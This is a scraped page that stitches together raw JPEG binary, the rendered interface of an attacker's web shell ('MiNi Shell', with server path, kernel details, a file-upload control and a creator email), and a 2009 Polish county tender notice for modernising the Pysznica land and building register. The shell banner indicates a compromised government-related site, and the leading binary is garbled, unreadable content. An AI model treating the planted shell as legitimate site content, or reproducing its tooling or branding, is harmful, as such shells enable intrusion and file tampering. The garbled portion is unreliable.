JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090514/148410-N-2009.html

<p class="kh_header"><b>Stalowa Wola: Modernizacja ewidencji gruntów i budynków obrębu ewidencyjnego Pysznica, Gmina Pysznica, Powiat Stalowowolski</b><br>
<b>Numer ogłoszenia: 148410 - 2009; data zamieszczenia: 14.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Stalowowolski , ul. Podleśna 15, 37-450 Stalowa Wola, woj. podkarpackie, tel. 015 643 37 09, faks 015 643 36 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stalowowolski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja ewidencji gruntów i budynków obrębu ewidencyjnego Pysznica, Gmina Pysznica, Powiat Stalowowolski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest modernizacja ewidencji gruntów i budynków dla obrębu ewidencyjnego  Pysznica, Gmina Pysznica, Powiat Stalowowolski.  

1.3.3.Zadanie polega na  modernizacji ewidencji gruntów i założeniu ewidencji  budynków i lokali dla obrębu ewidencyjnego Pysznica, Gmina Pysznica, Powiat Stalowowolski  w celu dostosowania do zgodności z przepisami rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia 29 marca 2001 r. w sprawie ewidencji gruntów i budynków ( Dz. U. Nr 38 poz.454 ) oraz instrukcji technicznej G-5 - ewidencja gruntów i budynków.

1.3.4.Prace muszą  być wykonane zgodnie z Projektem Modernizacji ewidencji gruntów i budynków dla miejscowości Pysznica uzgodnionym z Podkarpackim Wojewódzkim Inspektorem Nadzoru Geodezyjnego i Kartograficznego w Rzeszowie w dniu 23 kwietnia 2009 roku - Załącznik Nr 8 oraz zgodnie z Warunkami technicznym stanowiącymi Załącznik Nr 7 do Specyfikacji Istotnych Warunków Zamówienia.

1.3.5.Zakres opracowania obejmuje obszar zawarty w granicach obrębu Pysznica :
       - powierzchnia  - 3421 ha  w tym 606 ha Lasów Państwowych
       - ilość działek ewidencyjnych  - 6823 w tym 49 działek Lasów Państwowych
       - ilość jednostek rejestrowych - 3095 
       - ilość budynków - około 1500
       - ilość lokali - około 20

1.3.6. Informacja o dotychczasowym operacie ewidencyjnym Operat ewidencji gruntów funkcjonuje na bazie operatu ze scalenie gruntów wykonanego w 1977r. Aktualnie obowiązująca mapa ewidencji w skali 1:5000 powstała poprzez       fotograficzne przeskalowanie mapy scaleniowej opracowanej w skali 1:2000 na podstawie  pomiaru w terenie.

1.3.7.Wynikiem modernizacji będącej przedmiotem obecnego postępowania musi być opracowany przez Wykonawcę operat geodezyjno - prawny oraz operat opisowo - kartograficzny ( część  opisowa w systemie EW OPIS wersja 3.2.2 lub nowsza, część kartograficzna w systemie  EWMAPA dla Windows wersja 6.5 lub nowsza )..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.35.43.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta winna być zabezpieczona wadium na kwotę 6000 PLN
( słownie : sześć tysięcy złotych PLN )<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia zgodnie z art. 22 ust.1 ustawy Prawo zamówień publicznych mogą ubiegać się Wykonawcy, którzy:

	1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień;
        1.2.	posiadają niezbędną wiedzę i doświadczenie oraz  dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego  i osób  zdolnych do wykonania zamówienia
       1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
       1.4.	nie podlegają wykluczeniu z postępowania, o udzielenie zamówienia zgodnie z art. 24 

2.	O zamówienie publiczne mogą o zamówienie publiczne mogą ubiegać się Wykonawcy, którzy  spełnią następujące warunki szczegółowe określone przez Zamawiającego :
	
	2.1.	w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie 	zamówienia , a jeżeli okres prowadzenia działalności jest krótszy, w tym 	okresie, wykonali co najmniej jedno zamówienie odpowiadające swoim 	rodzajem 	usługom stanowiącym przedmiot  zamówienia  o wartości nie mniejszej 	niż  50 000 zł
	2.2.	dysponują co najmniej 2 osobami posiadającymi uprawnienia zawodowe, o których mowa w  art. 43  pkt 1 i 2 ustawy z dnia 17 maja 1989r. Prawo 	geodezyjne i kartograficzne -   Dz. U. z 2005r Nr  240 poz. 2027 z późn. zm.
	2.3.	udzielą gwarancji na wykonany przedmiot zamówienia na okres minimum 24 miesiące  

3.	Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu nastąpi wg formuły ,spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wymaganych przez Zamawiającego i wyszczególnionych w SIWZ, dołączonych do oferty.

4.	Zamawiający wezwie w trybie art. 26 ust. 3 ustawy p.z.p. Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa do ich złożenia w wyznaczonym terminie, chyba, że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.

5.	Wykaz dokumentów, na podstawie których zostanie dokonana ocena spełnienia warunków udziału w postępowaniu zawiera rozdz. IX SIWZ.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowią  Załącznik Nr 2 i Załącznik Nr 3 do niniejszej SIWZ.

1.W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy  Wykonawca składa następujące oświadczenia  lub  dokumenty;

1.1.  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.2.	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem  składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
1.3.	aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,

2. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje osobami zdolnymi do wykonania zamówienia składa następujące dokumenty 
	
2.1.wykaz wykonanych  usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających , że  usługi zostały wykonane należycie - Załącznik nr 5 ,  w tym co najmniej jedna usługę o wartości min 50 000 zł 
2.2.wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności -  Załącznik nr 4, w tym co najmniej 2 osoby posiadające uprawnienia zawodowe zgodnie z ustawą Prawo geodezyjne i kartograficzne - załączyć kserokopie uprawnień zawodowych dla tych osób. Jeżeli w wykazie wskazane zostaną osoby, którymi będzie dysponował Wykonawca do oferty należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.             		 

3.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z przepisami rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów jakich może zadać Zamawiający od Wykonawcy oraz form w jakich te dokumenty mogą być składane , Dz. U. Nr 87 poz. 605 i Rozporządzenia Prezesa Rady Ministrów z dnia 16 października 2008 r. zmieniającego rozporządzenie sprawie rodzajów dokumentów jakich może zadać Zamawiający od Wykonawcy oraz form w jakich te dokumenty mogą być składane , DZ.U. Nr 188 poz.1155.      

4.Oświadczenie o okresie gwarancji należy wypełnić w formularzu oferty Załącznik Nr1 
 	
5.Wykonawcy wspólnie ubiegający się o zamówienie:
5.1.W przypadku złożenia oferty wspólnej, Wykonawcy wspólnie ubiegający się o 	zamówienie:
-	ponoszą solidarną odpowiedzialność za niewykonanie lub  nienależyte wykonanie  zobowiązania,
-	zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu w  o udzielenie zamówienia publicznego, albo 	reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Przyjmuje się, że pełnomocnictwo do  podpisania oferty  obejmuje pełnomocnictwo do poświadczenia za zgodność z  oryginałem wszystkich dokumentów,
-	pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej mieć formę prawną,  pisemną; fakt ustanowienia Pełnomocnika musi wynikać z 	załączanych do oferty dokumentów, wszelka korespondencja prowadzona będzie  z Pełnomocnikiem
-	jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza Zamawiający  może przed zawarciem umowy wezwać Pełnomocnika do przedstawienia umowy  regulującej współpracę tych wykonawców

5.2. Składając ofertę wspólnie , art. 23 ustawy, przez dwóch lub więcej wykonawców  należy  zwrócić uwagę w szczególności na następujące wymagania:
       5.2.1. następujące dokumenty i oświadczenia:
                - oferta
                - oświadczenie o spełnianiu warunków podanych w art. 22 ust.1 pkt.1-3
                  Ustawy - Załącznik Nr 2 
	        - wykaz wykonanych usług - Załącznik nr 5  
		- wykaz osób - Załącznik Nr 4 			
		- dokumenty potwierdzające, że usługi zostały wykonane należycie
		   podpisują  wszyscy członkowie konsorcjum lub Pełnomocnik w imieniu 
                   całego konsorcjum
      5.2.2. następujące dokumenty i oświadczenia:
              - oświadczenie o spełnianiu warunku określonego w art. 22 ust. 1 pkt.4 
                 ustawy - Załącznik Nr 3 
              -	 odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji
                 działalności gospodarczej,
              -	 zaświadczenie naczelnika Urzędu Skarbowego, oddziału Zakładu  
Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia  Społecznego
składa każdy z członków konsorcjum w imieniu własnym 
5.3. Spełnienie warunku posiadania niezbędnej wiedzy i doświadczenia oraz   	          dysponowania   osobami zdolnymi do wykonania  zamówienia , wykaz osób , 	          będą oceniane łącznie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> powiatstalowa.bip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Stalowej Woli
37-450 Stalowa Wola ul. Podleśna 15
pokój nr 310 lub 311.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2009 godzina 11:00, miejsce: Starostwa Powiatowe w Stalowej Woli
37-450 Stalowa Wola ul. Podleśna 15
pokój nr 108 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com